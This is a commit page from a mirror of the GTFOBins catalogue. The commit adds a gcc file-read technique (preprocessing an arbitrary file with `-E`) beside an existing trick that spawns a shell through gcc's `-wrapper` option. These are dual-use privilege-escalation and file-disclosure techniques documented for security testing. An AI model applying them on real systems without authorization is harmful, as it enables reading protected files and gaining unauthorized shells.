mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
Add gcc file read
This is an improved version with respect to #138. Close #138.
This commit is contained in:
parent
c9f5c065c0
commit
04b29456a6
@ -1,5 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
|
file-read:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
gcc -x c -E "$LFILE"
|
||||||
shell:
|
shell:
|
||||||
- code: gcc -wrapper /bin/sh,-s .
|
- code: gcc -wrapper /bin/sh,-s .
|
||||||
sudo:
|
sudo:
|
||||||
|
Loading…
Reference in New Issue
Block a user